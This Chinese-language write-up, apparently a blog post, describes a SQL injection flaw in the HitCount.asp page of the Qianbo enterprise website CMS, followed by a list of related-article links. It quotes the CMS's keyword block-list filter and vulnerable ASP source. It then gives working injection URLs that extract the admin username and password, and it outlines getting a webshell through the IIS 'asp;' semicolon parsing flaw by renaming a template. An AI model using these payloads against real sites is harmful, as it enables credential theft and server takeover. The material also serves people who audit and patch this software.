千博企業網站管理系統HitCount.Asp頁面注入漏洞
程式都加入了防注入程式碼的,在NoSql.asp檔案中7kccopyd-code
<%
If EnableStopInjection = True Then
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Fy_In = "’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Fy_Inf = Split(Fy_In, "|")
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh = 0 To UBound(Fy_Inf)
If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=’JavaScript’>alert(’警告:引數非法!’);</Script>"
Response.End
End If
Next
Next
End If
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh = 0 To UBound(Fy_Inf)
If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=’JavaScript’>alert(’警告:引數非法!’);</Script>"
Response.End
Response.End
End If
Next
Next
End If
End If
%>
沒有過濾cookie,不過程式在對變數傳入時都限制了整型的,所以我也沒辦法。
繼續看。
MemberLogin.Asp這個檔案
Dim
LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql
LoginName = Trim(request.Form("LoginName"))
LoginPassword = Md5(request.Form("LoginPassword"))
Set rs = server.CreateObject("adodb.recordset")
sql
= "select * from Qianbo_Members where MemName=’"&LoginName&"’"
沒有加入防注入程式碼,不過卻是登入驗證頁面,如果是MSsql資料庫我們還好辦點。
這個時候,在HitCount.Asp這個檔案裡發現,檔案沒有呼叫防注入程式碼
<%
Dim rs, m_SQL
Dim m_ID
m_ID = ReplaceBadChar(Request.QueryString("id"))
m_LX = ReplaceBadChar(Request.QueryString("LX"))
action = ReplaceBadChar(Request.QueryString("action"))
If action = "count" Then
conn.Execute("update "&m_LX&" set ClickNumber = ClickNumber + 1 where ID=" & m_ID & "")
Else
m_SQL = "select ClickNumber from "&m_LX&" where ID=" & m_ID
Set rs = conn.Execute(m_SQL)
response.Write "document.write("&rs(0)&");"
rs.Close
Set rs = Nothing
End If
%>
就是這個檔案了。我們來構造注入語句
如下:
獲取管理密碼:
http://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin
獲取管理帳號:
http://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin
找後臺就訪問http://www.webshell.cc/sitemap.xml吧!
拿SHELL:
IIS的asp;分號解析漏洞還是害了不少人,千博企業網站管理系統.後臺拿SHELL依舊是修改模板*.asp;*生成。
相關文章
- eyoucmsPHP企業網站內容管理系統PHP網站
- 博商企業級網上商店系統
- wordpress企業網站主題仿製04-wordpress企業網站產品頁面新聞頁面仿製網站
- 漏洞管理系統建設淺議|企業漏洞庫建模要素
- DukuanCMS_V1.0.0,企業建站系統,開源免費,CMS系統,企業建站系統,可免費用於商業的企業網站管理系統網站
- 基於TP3.1開發的企業網站管理系統網站
- 免費開源TuziCMS基於ThinkPHP的企業網站管理系統PHP網站
- 易思企業網站管理系統ESPCMS去前臺版權網站
- 企業管理系統1.1.0
- 綠盟新一代網頁防篡改系統助力企業網站穩定執行網頁網站
- DF開源多語言企業網站管理系統基於TP3.2.3網站
- 作業系統漏洞這麼多,網站伺服器的漏洞怎麼辦?作業系統網站伺服器
- 企業網站頁面和內容設計時如何做好品牌介紹網站
- 網站後臺管理系統網站
- 企業管理系統上線後可能會面臨哪些問題?
- 百度回應“推廣賭博網站”:系企業私自違規更改,已報案網站
- 企業許可權管理系統
- 企業內容管理系統(ECM)
- 企業人力資源管理系統
- 管理系統解決企業管理難題
- 墨子企業官網系統
- Claroty披露西門子工業網路管理系統15個漏洞
- wordpress企業網站主題仿製02-wordpress企業網站首頁的仿製網站
- wordpress企業網站主題仿製03-wordpress企業網站page頁面的仿製網站
- 網站漏洞檢測 wordpress sql注入漏洞程式碼審計與修復網站SQL
- 禁止使用框架引用網站頁面框架網站
- 零基礎創作專業wordpress網站03-為網站新增頁面網站
- 企業專案管理系統是何?專案管理
- 資訊系統眼中的企業管理
- 餐飲行業企業管理系統開發行業
- API管理平臺,構建企業統一介面管理API
- 網站404頁面怎麼做 404頁面製作步驟網站
- 北大青鳥網站資訊展示頁面網站
- 如何設計好網站的頁面網站
- 中小企業管理升級的焦點——企業資源管理系統(ERP)
- ASP.NET動態網站開發培訓-24.論文管理系統(四、製作Login頁面和後臺論文管理主頁)ASP.NET網站
- 企業網路管理
- vue實現後臺管理系統頁面功能和頁面路由許可權的控制Vue路由